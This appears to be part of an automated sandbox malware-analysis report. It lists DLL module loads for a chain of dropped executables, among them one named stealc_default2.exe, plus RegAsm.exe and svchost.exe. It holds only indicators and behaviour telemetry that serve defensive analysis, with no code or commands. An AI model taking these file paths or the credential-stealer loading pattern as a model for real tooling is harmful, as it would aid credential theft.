Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Section loaded: dsound.dll
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
